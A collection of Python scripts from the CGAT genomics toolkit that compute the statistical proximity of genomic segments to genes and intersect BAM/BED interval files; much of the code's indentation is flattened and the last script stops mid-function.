raise NotImplementedError("define sample() in base classes")
class SamplerPermutation(Sampler):
"""permute order of fragments and distribute randomly.
The permutation works like this:
    1. Randomly permute the order of segments
    2. Split the free space (:attr:`mFreeLength`) within the workspace into n+1 randomly sized gaps
    3. Insert the gaps between the permuted segments
"""
def sample(self):
"""return simulated fragments."""
simulated = []
        # 1. permute the order of segments
random.shuffle(self.mLengths)
# 2. determine size of space between samples
points = []
for x in range(len(self.mLengths) + 1):
points.append(random.randint(0, self.mFreeLength))
points.sort()
# 3. move segments to appropriate place
start = self.mWorkStart
simulated = []
last = 0
for x in range(len(self.mLengths)):
start += points[x] - last
simulated.append((start, start + self.mLengths[x]))
start += self.mLengths[x]
last = points[x]
assert start + (points[-1] - last) <= self.mWorkEnd, "start=%i, points[-1]=%i, work_end=%i" % \
(start, points[-1] - last, self.mWorkEnd)
return simulated
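# Example (a sketch with made-up coordinates): for observed segments
# [(10, 20), (30, 35)] in a workspace (0, 100),
# SamplerPermutation([(10, 20), (30, 35)], 0, 100).sample() returns two
# non-overlapping segments of lengths 10 and 5 placed at random positions
# within (0, 100); segment lengths are always preserved, only positions change.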
class SamplerBlocks(Sampler):
"""move blocks of fragments to take into account clustering."""
def sample(self):
"""return simulated fragments."""
simulated = []
raise NotImplementedError
class SamplerGaps(Sampler):
"""rearrange gaps within a block randomly.
    This sampler will preserve some of the clustering structure of the segments."""
def __init__(self, *args, **kwargs):
Sampler.__init__(self, *args, **kwargs)
self.mGapLengths = [x[1] - x[0]
for x in Intervals.complement(self.mObserved, self.mWorkStart, self.mWorkEnd)]
def sample(self):
"""return simulated fragments."""
simulated = []
gaps = self.mGapLengths
random.shuffle(gaps)
start = self.mWorkStart
for x in range(len(self.mLengths)):
start += gaps[x]
simulated.append((start, start + self.mLengths[x]))
start += self.mLengths[x]
return simulated
class CountingResults(object):
"""a container for observed and simulated counts.
"""
def __init__(self, labels):
self.mLabels = labels
self.mTransform = None
self.mEnvelopes = {}
self.mMedians = {}
self.mObservedCounts = None
self.mSimulatedCounts = None
self.mStats = None
def updateFDR(self, obs_pvalues, sim_pvalues):
"""compute fdr stats with given counts.
If obs_pvalues and sim_pvalues are given, computes the FDR (q-value) for the observed p-value.
The q-value is the expected proportion of false positive observations at
the observed p-value.
qvalue = A / B
A: average proportion of simulated data with P-Values < pvalue (expected false positive RATE)
B: number of observed data with P-Values < pvalue (NUMBER of true positives)
As there are several counters and labels, all observed and simulated pvalues
are taken into account.
The method needs to be called after :meth:update.
"""
assert self.mStats is not None, "updateFDR called before calling update."
for label in self.mLabels:
pvalue = self.mStats[label].pvalue
            a = scipy.stats.percentileofscore(sim_pvalues, pvalue) / 100.0
            b = scipy.stats.percentileofscore(
                obs_pvalues, pvalue) / 100.0 * len(obs_pvalues)
            if b > 0:
                qvalue = min(1.0, a / b)
            else:
                qvalue = 0
self.mStats[label] = self.mStats[label]._replace(qvalue=qvalue)
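    # Worked example (hypothetical numbers): if 5 of 100 simulated p-values are
    # <= the observed p-value, a = 0.05; if 20 of 200 observed p-values are
    # <= that p-value, b = 20, giving qvalue = min(1.0, 0.05 / 20) = 0.0025.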
def update(self):
"""update stats from given counts.
"""
assert self.mObservedCounts is not None, "update called without observed counts."
assert self.mSimulatedCounts is not None, "update called without simulated counts."
self.mStats = {}
cls = collections.namedtuple(
"st", "observed expected ci95lower ci95upper pvalue qvalue")
for label in self.mLabels:
obs = cumulative_transform(
self.mObservedCounts[label], self.mObservedCounts.mOutOfBounds[label])
pobs = findMedian(obs)
medians = self.getMedians(label)
medians.sort()
pvalue = float(
scipy.stats.percentileofscore(medians, pobs)) / 100.0
self.mStats[label] = cls(
pobs,
scipy.mean(medians),
scipy.stats.scoreatpercentile(medians, 5),
scipy.stats.scoreatpercentile(medians, 95),
pvalue, None)
def getLabels(self):
return self.mLabels
def getMedians(self, label):
"""compute medians of all samples."""
if label not in self.mMedians:
num_samples = len(self.mSimulatedCounts)
medians = []
for x in range(num_samples):
data = self.mSimulatedCounts[x][label]
threshold = self.mSimulatedCounts[x].mTotals[label] / 2
t = 0
for d in range(len(data)):
if t > threshold:
break
t += data[d]
medians.append(d)
self.mMedians[label] = medians
return self.mMedians[label]
def getEnvelope(self, label, transform):
"""compute envelope for label using transform.
        The envelope is the min, max and mean of the simulated counts
        at each position.
This function does a lazy evaluation. Pre-computed results are stored
and returned if the same transform is applied.
"""
if label in self.mEnvelopes and transform == self.mTransform:
E.debug("returning cached envelope for transform %s" %
str(transform))
return self.mEnvelopes[label]
E.debug("computing new envelope for transform %s" % str(transform))
num_samples = len(self.mSimulatedCounts)
mmin = numpy.array(transform(self.mSimulatedCounts[0][
label], self.mSimulatedCounts[0].mOutOfBounds[label]), numpy.float)
msum = numpy.array(transform(self.mSimulatedCounts[0][
label], self.mSimulatedCounts[0].mOutOfBounds[label]), numpy.float)
mmax = numpy.array(transform(self.mSimulatedCounts[0][
label], self.mSimulatedCounts[0].mOutOfBounds[label]), numpy.float)
for x in range(1, num_samples):
v = transform(
self.mSimulatedCounts[x][label], self.mSimulatedCounts[x].mOutOfBounds[label])
mmin = numpy.minimum(mmin, v)
mmax = numpy.maximum(mmax, v)
msum = msum + v
msum /= num_samples
self.mTransform = transform
self.mEnvelopes[label] = (mmin, mmax, msum)
return self.mEnvelopes[label]
class Counter(object):
"""return object that counts segments in a workspace.
A counter will implement an addCounts method that expects a sorted
list of intervals within a region bounded by start,end.
"""
# python list is fastest for single value access, but requires a lot of
# memory. python array is a good compromise - slightly slower than python list
# but uses much less space. For range access, use numpy arrays.
mBuildCounts = lambda self, num_bins, dtype: array.array(
"I", [0] * num_bins)
def __init__(self, labels, num_bins, resolution=1, dtype=numpy.int8):
self.mCounts = {}
self.mTotals = {}
# keep separate out-of-bounds counts in order to not interfere with
# dtype
self.mOutOfBounds = {}
b = self.mBuildCounts
for l in labels:
self.mCounts[l] = self.mBuildCounts(num_bins, dtype)
self.mTotals[l] = 0
self.mOutOfBounds[l] = 0
self.mNumBins = num_bins
self.mResolution = resolution
def __getitem__(self, key):
return self.mCounts[key]
def getLabels(self):
return self.mCounts.keys()
def resolve(self, value):
if self.mResolution > 1:
return int(math.floor(float(value) / self.mResolution))
else:
return value
class CounterTranscription(Counter):
"""count transcription per base."""
mName = "Transcription"
# numpy is fastest for counting with blocks of data
mBuildCounts = lambda self, num_bins, dtype: numpy.zeros(num_bins, dtype)
def addCounts(self, rr, start, end, left_labels, right_labels):
counts = self.mCounts
totals = self.mTotals
ofb = self.mOutOfBounds
nbins = self.mNumBins
resolve = self.resolve
for istart, iend in rr:
l = iend - istart
dl = istart - start
dr = end - iend
l = self.resolve(l)
if dl < dr:
pos = self.resolve(dl)
labels = left_labels
elif dl > dr:
pos = self.resolve(dr)
labels = right_labels
else:
continue
if pos >= nbins:
for label in labels:
ofb[label] += l
totals[label] += l
else:
for label in labels:
counts[label][pos:pos + l] += 1
totals[label] += l
class CounterClosestDistance(Counter):
"""count closest distance."""
mName = "Closest distance"
def addCounts(self, rr, start, end, left_labels, right_labels):
counts = self.mCounts
totals = self.mTotals
ofb = self.mOutOfBounds
nbins = self.mNumBins
resolve = self.resolve
def __add(pos, labels):
if pos >= nbins:
for label in labels:
self.mOutOfBounds[label] += 1
totals[label] += 1
else:
for label in labels:
counts[label][pos] += 1
totals[label] += 1
pos = self.resolve(rr[0][0] - start)
__add(pos, left_labels)
pos = self.resolve(end - rr[-1][1])
__add(pos, right_labels)
class CounterAllDistances(Counter):
"""count all distances."""
mName = "All distances"
def addCounts(self, rr, start, end, left_labels, right_labels):
counts = self.mCounts
totals = self.mTotals
ofb = self.mOutOfBounds
nbins = self.mNumBins
resolve = self.resolve
for istart, iend in rr:
dl = istart - start
dr = end - iend
if dl < dr:
pos = resolve(dl)
labels = left_labels
elif dl > dr:
pos = resolve(dr)
labels = right_labels
else:
continue
if pos >= nbins:
for label in labels:
ofb[label] += 1
totals[label] += 1
else:
for label in labels:
counts[label][pos] += 1
totals[label] += 1
def indexIntervals(intervals, with_values=False):
"""index intervals using bx.
"""
indexed = {}
for contig, values in intervals.iteritems():
intersector = bx.intervals.intersection.Intersecter()
if with_values:
for start, end, value in values:
intersector.add_interval(
bx.intervals.Interval(start, end, value=value))
else:
for start, end in values:
intersector.add_interval(bx.intervals.Interval(start, end))
indexed[contig] = intersector
return indexed
def plotCounts(counter, options, transform=lambda x, y: x):
"""create plots from counter."""
num_bins = options.num_bins
resolution = options.resolution
bins = numpy.array(xrange(num_bins)) * resolution
for label in counter.getLabels():
fig = plt.figure()
if options.plot_samples:
for x in range(options.num_samples):
counts = transform(counter.mSimulatedCounts[x][
label], counter.mSimulatedCounts[x].mOutOfBounds[label])
                plt.plot(bins, counts, label="sample_%i" % x)
if options.plot_envelope:
# counts per sample are in row
mmin, mmax, mmean = counter.getEnvelope(label, transform)
plt.plot(bins, mmin, label="min")
plt.plot(bins, mmax, label="max")
plt.plot(bins, mmean, label="mean")
plt.plot(bins, transform(counter.mObservedCounts[
label], counter.mObservedCounts.mOutOfBounds[label]), label="observed")
plt.xlim(options.xrange)
plt.legend()
plt.title(counter.mName)
plt.xlabel("distance from gene / bp")
plt.ylabel("frequency")
fig.suptitle(str(label))
if options.logscale:
if "x" in options.logscale:
plt.gca().set_xscale('log')
if "y" in options.logscale:
plt.gca().set_yscale('log')
if options.hardcopy:
plt.savefig(os.path.expanduser(options.hardcopy % label))
def findMedian(dist):
"""find median in cumulative and normalized distribution."""
x = 0
while dist[x] < 0.5:
x += 1
return x
def main(argv=sys.argv):
parser = E.OptionParser(
version="%prog version: $Id: annotator_distance.py 2861 2010-02-23 17:36:32Z andreas $", usage=globals()["__doc__"])
parser.add_option("-a", "--annotations-tsv-file", dest="filename_annotations", type="string",
help="filename mapping gene ids to annotations (a tab-separated table with two-columns) [default=%default].")
parser.add_option("-r", "--resolution", dest="resolution", type="int",
help="resolution of count vector [default=%default].")
parser.add_option("-b", "--num-bins", dest="num_bins", type="int",
help="number of bins in count vector [default=%default].")
parser.add_option("-i", "--num-samples", dest="num_samples", type="int",
help="sample size to compute [default=%default].")
parser.add_option("-w", "--workspace-bed-file", dest="filename_workspace", type="string",
help="filename with workspace information [default=%default].")
parser.add_option("--workspace-builder", dest="workspace_builder", type="choice",
choices=(
"gff", "gtf-intergenic", "gtf-intronic", "gtf-genic"),
help="given a gff/gtf file build a workspace [default=%default].")
parser.add_option("--workspace-labels", dest="workspace_labels", type="choice",
choices=("none", "direction", "annotation"),
help="labels to use for the workspace workspace [default=%default].")
parser.add_option("--sampler", dest="sampler", type="choice",
choices=("permutation", "gaps"),
help="sampler to use. The sampler determines the null model of how segments are distributed in the workspace [default=%default]")
parser.add_option("--counter", dest="counters", type="choice", action="append",
choices=(
"transcription", "closest-distance", "all-distances"),
help="counter to use. The counter computes the quantity of interest [default=%default]")
parser.add_option("--analysis", dest="analysis", type="choice", action="append",
choices=("proximity", "area-under-curve"),
help="analysis to perform [default=%default]")
parser.add_option("--transform-counts", dest="transform_counts", type="choice",
choices=("raw", "cumulative"),
help="cumulate counts [default=%default].")
parser.add_option("-s", "--segments", dest="filename_segments", type="string",
help="filename with segment information [default=%default].")
parser.add_option("--xrange", dest="xrange", type="string",
help="xrange to plot [default=%default]")
parser.add_option("-o", "--logscale", dest="logscale", type="string",
help="use logscale on x, y or xy [default=%default]")
parser.add_option("-p", "--plot", dest="plot", action="store_true",
help="output plots [default=%default]")
parser.add_option("--hardcopy", dest="hardcopy", type="string",
help="output hardcopies to file [default=%default]")
parser.add_option("--no-fdr", dest="do_fdr", action="store_false",
help="do not compute FDR rates [default=%default]")
parser.add_option("--segments-format", dest="segments_format", type="choice",
choices=("gtf", "bed"),
help="format of segments file [default=%default].")
parser.add_option("--truncate", dest="truncate", action="store_true",
help="truncate segments extending beyond a workspace [default=%default]")
parser.add_option("--remove-overhangs", dest="remove_overhangs", action="store_true",
help="remove segments extending beyond a workspace[default=%default]")
parser.add_option("--keep-ambiguous", dest="keep_ambiguous", action="store_true",
help="keep segments extending to more than one workspace [default=%default]")
parser.set_defaults(
filename_annotations=None,
filename_workspace="workspace.gff",
filename_segments="FastDown.gtf",
filename_annotations_gtf="../data/tg1_territories.gff",
workspace_builder="gff",
workspace_labels="none",
sampler="permutation",
truncate=False,
num_bins=10000,
num_samples=10,
resolution=100,
plot_samples=False,
plot_envelope=True,
counters=[],
transform_counts="raw",
xrange=None,
plot=False,
logscale=None,
output_all=False,
do_test=False,
analysis=[],
do_fdr=True,
hardcopy="%s.png",
segments_format="gtf",
remove_overhangs=False,
)
(options, args) = E.Start(parser, argv=argv, add_output_options=True)
###########################################
# setup options
if options.sampler == "permutation":
sampler = SamplerPermutation
elif options.sampler == "gaps":
sampler = SamplerGaps
if options.xrange:
options.xrange = map(float, options.xrange.split(","))
if len(options.counters) == 0:
raise ValueError("please specify at least one counter.")
if len(options.analysis) == 0:
raise ValueError("please specify at least one analysis.")
if options.workspace_labels == "annotation" and not options.filename_annotations:
raise ValueError(
"please specify --annotations-tsv-file is --workspace-labels=annotations.")
###########################################
# read data
if options.workspace_labels == "annotation":
def constant_factory(value):
return itertools.repeat(value).next
def dicttype():
return collections.defaultdict(constant_factory(("unknown",)))
map_id2annotations = IOTools.readMultiMap(open(options.filename_annotations, "r"),
dtype=dicttype)
else:
map_id2annotations = {}
workspace = readWorkspace(open(options.filename_workspace, "r"),
options.workspace_builder,
options.workspace_labels,
map_id2annotations)
E.info("read workspace for %i contigs" % (len(workspace)))
indexed_workspace = indexIntervals(workspace, with_values=True)
segments = readSegments(open(options.filename_segments, "r"), indexed_workspace,
format=options.segments_format,
keep_ambiguous=options.keep_ambiguous,
truncate=options.truncate,
remove_overhangs=options.remove_overhangs)
nsegments = 0
for contig, vv in segments.iteritems():
nsegments += len(vv)
E.info("read %i segments for %i contigs" % (nsegments, len(workspace)))
indexed_segments = indexIntervals(segments, with_values=False)
if nsegments == 0:
E.warn("no segments read - no computation done.")
E.Stop()
return
# build labels
labels = collections.defaultdict(int)
for contig, vv in workspace.iteritems():
for start, end, v in vv:
for l in v[0]:
labels[l] += 1
for l in v[1]:
labels[l] += 1
E.info("found %i workspace labels" % len(labels))
###########################################
# setup counting containers
counters = []
for cc in options.counters:
if cc == "transcription":
counter = CounterTranscription
elif cc == "closest-distance":
counter = CounterClosestDistance
elif cc == "all-distances":
counter = CounterAllDistances
if nsegments < 256:
dtype = numpy.uint8
elif nsegments < 65536:
dtype = numpy.uint16
elif nsegments < 4294967296:
dtype = numpy.uint32
else:
dtype = numpy.int
E.debug("choosen dtype %s" % str(dtype))
E.info("samples space is %i bases: %i bins at %i resolution" %
(options.num_bins * options.resolution,
options.num_bins,
options.resolution,
))
E.info("allocating counts: %i bytes (%i labels, %i samples, %i bins)" %
(options.num_bins * len(labels) * dtype().itemsize * (options.num_samples + 1),
len(labels),
options.num_samples,
options.num_bins,
))
c = CountingResults(labels)
c.mObservedCounts = counter(
labels, options.num_bins, options.resolution, dtype=dtype)
simulated_counts = []
for x in range(options.num_samples):
simulated_counts.append(
counter(labels, options.num_bins, options.resolution, dtype=dtype))
c.mSimulatedCounts = simulated_counts
c.mName = c.mObservedCounts.mName
counters.append(c)
E.info("allocated memory successfully")
segments_per_workspace = []
segment_sizes = []
segments_per_label = collections.defaultdict(int)
workspaces_per_label = collections.defaultdict(int)
############################################
    # get observed and simulated counts
nworkspaces, nempty_workspaces, nempty_contigs, nmiddle = 0, 0, 0, 0
iteration2 = 0
for contig, vv in workspace.iteritems():
iteration2 += 1
E.info("counting %i/%i: %s %i segments" %
(iteration2,
len(workspace),
contig,
len(vv)))
if len(vv) == 0:
continue
iteration1 = 0
for work_start, work_end, v in vv:
left_labels, right_labels = v[0], v[1]
iteration1 += 1
# ignore empty segments
if contig not in indexed_segments:
nempty_contigs += 1
continue
r = indexed_segments[contig].find(work_start, work_end)
segments_per_workspace.append(len(r))
if not r:
nempty_workspaces += 1
continue
# collect segments and stats
nworkspaces += 1
observed = [(x.start, x.end) for x in r]
observed.sort()
segments_per_workspace.append(len(observed))
segment_sizes.extend([x[1] - x[0] for x in observed])
# collect basic counts
for label in list(left_labels) + list(right_labels):
workspaces_per_label[label] += 1
segments_per_label[label] += len(observed)
# add observed counts
for counter in counters:
counter.mObservedCounts.addCounts(
observed, work_start, work_end, left_labels, right_labels)
# create sampler
s = sampler(observed, work_start, work_end)
# add simulated counts
for iteration in range(options.num_samples):
simulated = s.sample()
for counter in counters:
counter.mSimulatedCounts[iteration].addCounts(
simulated, work_start, work_end, left_labels, right_labels)
E.info("counting finished")
E.info("nworkspaces=%i, nmiddle=%i, nempty_workspaces=%i, nempty_contigs=%i" %
(nworkspaces, nmiddle, nempty_workspaces, nempty_contigs))
######################################################
# transform counts
if options.transform_counts == "cumulative":
transform = cumulative_transform
elif options.transform_counts == "raw":
transform = normalize_transform
####################################################
# analysis
if "proximity" in options.analysis:
outfile_proximity = E.openOutputFile("proximity")
outfile_proximity.write("\t".join(("label", "observed", "pvalue",
"expected", "CIlower", "CIupper", "qvalue", "segments", "workspaces")) + "\n")
else:
outfile_proximity = None
if "area-under-curve" in options.analysis:
outfile_auc = E.openOutputFile("auc")
outfile_auc.write("label\tobserved\texpected\tCIlower\tCIupper\n")
else:
outfile_auc = None
# qvalue: expected false positives at p-value
# qvalue = expected false positives /
    if options.do_fdr:
        E.info("computing pvalues for fdr")
        # collect all P-Values of simulated results to compute FDR
        sim_pvalues = []
        for counter in counters:
            for label in labels:
                E.info("working on counter:%s label:%s" % (counter, label))
                medians = counter.getMedians(label)
                for median in medians:
                    pvalue = float(
                        scipy.stats.percentileofscore(medians, median)) / 100.0
                    sim_pvalues.append(pvalue)
        sim_pvalues.sort()
else:
sim_pvalues = []
# compute observed p-values
for counter in counters:
counter.update()
obs_pvalues = []
for counter in counters:
for label in labels:
obs_pvalues.append(counter.mStats[label].pvalue)
obs_pvalues.sort()
    # compute FDR q-values for the observed p-values
if options.do_fdr:
for counter in counters:
counter.updateFDR(obs_pvalues, sim_pvalues)
for counter in counters:
outofbounds_sim, totals_sim = 0, 0
outofbounds_obs, totals_obs = 0, 0
for label in labels:
for sample in range(options.num_samples):
if counter.mSimulatedCounts[sample].mOutOfBounds[label]:
E.debug("out of bounds: sample %i, label %s, counts=%i" %
(sample, label, counter.mSimulatedCounts[sample].mOutOfBounds[label]))
outofbounds_sim += counter.mSimulatedCounts[
sample].mOutOfBounds[label]
totals_sim += counter.mSimulatedCounts[sample].mTotals[label]
outofbounds_obs += counter.mObservedCounts.mOutOfBounds[label]
totals_obs += counter.mObservedCounts.mTotals[label]
E.info("out of bounds observations: observed=%i/%i (%5.2f%%), simulations=%i/%i (%5.2f%%)" %
(outofbounds_obs, totals_obs,
100.0 * outofbounds_obs / totals_obs,
outofbounds_sim, totals_sim,
100.0 * outofbounds_sim / totals_sim,
))
for label in labels:
if outfile_auc:
mmin, mmax, mmean = counter.getEnvelope(
label, transform=normalize_transform)
obs = normalize_transform(
counter.mObservedCounts[label], counter.mObservedCounts.mOutOfBounds[label])
def block_iterator(a1, a2, a3, num_bins):
x = 0
while x < num_bins:
while x < num_bins and a1[x] <= a2[x]:
x += 1
start = x
while x < options.num_bins and a1[x] > a2[x]:
x += 1
end = x
total_a1 = a1[start:end].sum()
total_a3 = a3[start:end].sum()
if total_a1 > total_a3:
yield (total_a1 - total_a3, start, end, total_a1, total_a3)
blocks = list(
block_iterator(obs, mmax, mmean, options.num_bins))
if options.output_all:
for delta, start, end, total_obs, total_mean in blocks:
if end - start <= 1:
continue
outfile_auc.write("%s\t%i\t%i\t%i\t%f\t%f\t%f\t%f\t%f\n" %
(label,
start * options.resolution,
end * options.resolution,
(end - start) * options.resolution,
total_obs,
total_mean,
delta,
total_obs / total_mean,
100.0 * (total_obs / total_mean - 1.0)))
# output best block
blocks.sort()
delta, start, end, total_obs, total_mean = blocks[-1]
outfile_auc.write("%s\t%i\t%i\t%i\t%f\t%f\t%f\t%f\t%f\n" %
(label,
start * options.resolution,
end * options.resolution,
(end - start) * options.resolution,
total_obs,
total_mean,
delta,
total_obs / total_mean,
100.0 * (total_obs / total_mean - 1.0)))
if outfile_proximity:
# find error bars at median
st = counter.mStats[label]
outfile_proximity.write("%s\t%i\t%f\t%i\t%i\t%i\t%s\t%i\t%i\n" %
(label,
st.observed *
options.resolution,
st.pvalue,
st.expected *
options.resolution,
st.ci95lower *
options.resolution,
st.ci95upper *
options.resolution,
IOTools.val2str(st.qvalue),
segments_per_label[label],
workspaces_per_label[label],
))
if options.plot:
for counter in counters:
plotCounts(counter, options, transform)
# plot summary stats
plt.figure()
plt.title("distribution of workspace length")
data = []
for contig, segs in workspace.iteritems():
if len(segs) == 0:
continue
data.extend([x[1] - x[0] for x in segs])
vals, bins = numpy.histogram(
data, bins=numpy.arange(0, max(data), 100), new=True)
t = float(sum(vals))
plt.plot(bins[:-1], numpy.cumsum(vals) / t)
plt.gca().set_xscale('log')
plt.legend()
t = float(sum(vals))
plt.xlabel("size of workspace")
plt.ylabel("cumulative relative frequency")
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "workspace_size"))
plt.figure()
plt.title("segments per block")
vals, bins = numpy.histogram(segments_per_workspace, bins=numpy.arange(
0, max(segments_per_workspace), 1), new=True)
plt.plot(bins[:-1], vals)
plt.xlabel("segments per block")
plt.ylabel("absolute frequency")
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "segments_per_block"))
plt.figure()
plt.title("workspaces per label")
plt.barh(
range(0, len(labels)), [workspaces_per_label[x] for x in labels], height=0.5)
plt.yticks(range(0, len(labels)), labels)
plt.ylabel("workspaces per label")
plt.xlabel("absolute frequency")
plt.gca().set_xscale('log')
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "workspaces_per_label"))
plt.figure()
plt.title("segments per label")
plt.barh(range(0, len(labels)), [segments_per_label[x]
for x in labels], height=0.5)
plt.yticks(range(0, len(labels)), labels)
plt.ylabel("segments per label")
plt.xlabel("absolute frequency")
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "segments_per_label"))
if not options.hardcopy:
plt.show()
E.Stop()
if __name__ == "__main__":
sys.exit(main())
```
#### File: cgat/scripts/bam_vs_bed.py
```python
import sys
import collections
import itertools
import subprocess
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import pysam
import CGAT.Bed as Bed
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-m", "--min-overlap", dest="min_overlap",
type="float",
help="minimum overlap [%default]")
parser.add_option("-a", "--bam-file", dest="filename_bam",
metavar="bam", type="string",
help="bam-file to use (required) [%default]")
parser.add_option("-b", "--bed-file", dest="filename_bed",
metavar="bed", type="string",
help="bed-file to use (required) [%default]")
parser.add_option(
"-s", "--sort-bed", dest="sort_bed",
action="store_true",
help="sort the bed file by chromosomal location before "
"processing. "
"[%default]")
parser.add_option(
"--assume-sorted", dest="sort_bed",
action="store_false",
help="assume that the bed-file is sorted by chromosomal location. "
"[%default]")
parser.add_option(
"--split-intervals", dest="split_intervals",
action="store_true",
help="treat split BAM intervals, for example spliced intervals, "
"as separate intervals. Note that a single alignment might be "
"counted several times as a result. "
"[%default]")
parser.set_defaults(
min_overlap=0.5,
filename_bam=None,
filename_bed=None,
sort_bed=True,
split_intervals=False,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
filename_bam = options.filename_bam
filename_bed = options.filename_bed
if filename_bam is None and filename_bed is None:
if len(args) != 2:
raise ValueError(
"please supply a bam and a bed file or two bed-files.")
filename_bam, filename_bed = args
if filename_bed is None:
raise ValueError("please supply a bed file to compare to.")
if filename_bam is None:
raise ValueError("please supply a bam file to compare with.")
E.info("intersecting the two files")
min_overlap = options.min_overlap
options.stdout.write("category\talignments\n")
# get number of columns of reference bed file
for bed in Bed.iterator(IOTools.openFile(filename_bed)):
ncolumns_bed = bed.columns
break
E.info("assuming %s is bed%i format" % (filename_bed, ncolumns_bed))
if ncolumns_bed < 4:
raise ValueError("please supply a name attribute in the bed file")
# get information about
if filename_bam.endswith(".bam"):
format = "-abam"
samfile = pysam.Samfile(filename_bam, "rb")
total = samfile.mapped
# latest bedtools uses bed12 format when bam is input
ncolumns_bam = 12
# count per read
sort_key = lambda x: x.name
else:
format = "-a"
total = IOTools.getNumLines(filename_bam)
# get bed format
ncolumns_bam = 0
for bed in Bed.iterator(IOTools.openFile(filename_bam)):
ncolumns_bam = bed.columns
break
if ncolumns_bam > 0:
E.info("assuming %s is bed%i fomat" % (filename_bam, ncolumns_bam))
if ncolumns_bam == 3:
# count per interval
sort_key = lambda x: (x.contig, x.start, x.end)
else:
# count per interval category
sort_key = lambda x: x.name
# use fields for bam/bed file (regions to count with)
data_fields = [
"contig", "start", "end", "name",
"score", "strand", "thickstart", "thickend", "rgb",
"blockcount", "blockstarts", "blockends"][:ncolumns_bam]
# add fields for second bed (regions to count in)
data_fields.extend([
"contig2", "start2", "end2", "name2",
"score2", "strand2", "thickstart2", "thickend2", "rgb2",
"blockcount2", "blockstarts2", "blockends2"][:ncolumns_bed])
# add bases overlap
data_fields.append("bases_overlap")
data = collections.namedtuple("data", data_fields)
options.stdout.write("total\t%i\n" % total)
if total == 0:
E.warn("no data in %s" % filename_bam)
return
    # SNS: sorting of the bed file is optional (enabled by default,
    # disable with --assume-sorted)
if options.sort_bed:
bedcmd = "<( zcat %s | sort -k1,1 -k2,2n)" % filename_bed
else:
bedcmd = filename_bed
if options.split_intervals:
split = "-split"
else:
split = ""
# IMS: newer versions of intersectBed have a very high memory
# requirement unless passed sorted bed files.
statement = """bedtools intersect %(format)s %(filename_bam)s
-b %(bedcmd)s
%(split)s
-sorted -bed -wo -f %(min_overlap)f""" % locals()
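    # For illustration only (paths are hypothetical), with the default options
    # the statement expands to something like:
    #   bedtools intersect -abam reads.bam
    #       -b <( zcat regions.bed.gz | sort -k1,1 -k2,2n)
    #       -sorted -bed -wo -f 0.500000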
E.info("starting counting process: %s" % statement)
proc = E.run(statement,
return_popen=True,
stdout=subprocess.PIPE)
E.info("counting")
counts_per_alignment = collections.defaultdict(int)
take_columns = len(data._fields)
def iter(infile):
for line in infile:
if not line.strip():
continue
yield data._make(line[:-1].split()[:take_columns])
for read, overlaps in itertools.groupby(iter(proc.stdout), key=sort_key):
annotations = [x.name2 for x in overlaps]
for anno in annotations:
counts_per_alignment[anno] += 1
for key, counts in counts_per_alignment.iteritems():
options.stdout.write("%s\t%i\n" % (key, counts))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/bed2graph.py
```python
import sys
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.Bed as Bed
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: bed2graph.py 2861 2010-02-23 17:36:32Z andreas $", usage=globals()["__doc__"])
parser.add_option("-o", "--output-section", dest="output", type="choice",
choices=("full", "name"),
help="output either ``full`` overlapping entries, only the ``name``s. [default=%default].")
parser.set_defaults(
output="full",
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) != 2:
raise ValueError("two arguments required")
if args[0] == "-":
infile1 = options.stdin
else:
infile1 = IOTools.openFile(args[0], "r")
infile2 = IOTools.openFile(args[1], "r")
idx = Bed.readAndIndex(infile2, with_values=True)
output = options.output
outfile = options.stdout
if output == "name":
outfile.write("name1\tname2\n")
outf = lambda x: x.fields[0]
else:
outf = str
for bed in Bed.iterator(infile1):
try:
overlaps = idx[bed.contig].find(bed.start, bed.end)
except (KeyError, IndexError):
# ignore missing contig and zero length intervals
continue
for o in overlaps:
outfile.write("\t".join((outf(bed), outf(o[2]))) + "\n")
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/bed2psl.py
```python
import sys
import CGAT.Experiment as E
import CGAT.Blat as Blat
import CGAT.Bed as Bed
import CGAT.IndexedFasta as IndexedFasta
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: bed2psl.py 2899 2010-04-13 14:37:37Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-q", "--query", dest="query", type="string",
help="sequence to use for query [default=%default].")
parser.add_option("-t", "--target", dest="target", type="string",
help="sequence to use for target [default=%default].")
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome.")
parser.set_defaults(
genome_file=None,
query=None,
target=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# do sth
ninput, nskipped, noutput = 0, 0, 0
if options.genome_file:
fasta = IndexedFasta.IndexedFasta(options.genome_file)
else:
fasta = None
psl = Blat.Match()
for bed in Bed.iterator(options.stdin):
ninput += 1
start, end = bed.start, bed.end
if "blockSizes" in bed:
psl.mQueryId = bed["name"]
blocksizes = [int(x) for x in bed["blockSizes"].split(",")[:-1]]
sbjctblockstarts = [
int(x) + start for x in bed["blockStarts"].split(",")[:-1]]
strand = bed["strand"]
else:
psl.mQueryId = "%i" % ninput
blocksizes = [end - start]
sbjctblockstarts = [start, ]
strand = "+"
psl.mSbjctId = bed.contig
psl.mSbjctFrom, psl.mSbjctTo = start, end
psl.mQueryFrom, psl.mQueryTo = 0, end - start
psl.mBlockSizes = blocksizes
psl.mNBlocks = len(blocksizes)
psl.strand = strand
q, qp = [], 0
